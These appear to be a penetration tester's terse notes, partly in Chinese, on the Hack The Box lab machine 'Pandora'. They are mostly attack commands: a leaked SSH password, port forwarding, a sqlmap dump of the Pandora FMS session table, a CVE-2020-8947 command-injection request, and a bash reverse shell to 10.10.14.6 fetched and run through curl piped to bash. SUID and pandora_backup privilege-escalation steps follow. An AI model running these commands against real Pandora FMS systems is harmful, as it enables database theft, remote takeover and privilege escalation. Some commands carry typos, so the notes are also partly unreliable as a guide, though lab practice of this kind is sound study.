Pandora

10.129.134.46
ssh daniel@10.129.134.46
HotelBabylon23

g4e01qdgk36mfdh90hvcc54umq

配置端口转发

ssh -fgN -L 8989:localhost:80 daniel@10.129.134.46

配置proxychains

sudo vim /etc/proxychains.con
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4    127.0.0.1 9050
socks5 127.0.0.1 9098 daniel HotelBabylon23

sqlmap

sqlmap --url="http://10.129.134.46:8989/pandora_console/include/chart_generator.php?session_id=''" -D pandora -T tsessions_php --dump --batch

CVE-2020-8947

POST /pandora_console/ajax.php HTTP/1.1

page=include%2fajax%2fevents&perform_event_response=10000000&target=whoami&response_id=1

反弹shell

$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.6/1337 0>&1

$ ls
shll.sh

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

$ nc -nvlp 9999

payload

$ curl+10.10.14.6:80/shell.sh|bash

权限提升

查找所有带有SUID权限的文件
$ find / -perm -4000 2>/dev/null


$ ls -al /usr/bin/pandora_backup

$ /usr/bin/pandora_backup

$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null

$ python -c "import pty;pty.spawn('/bin/bash')"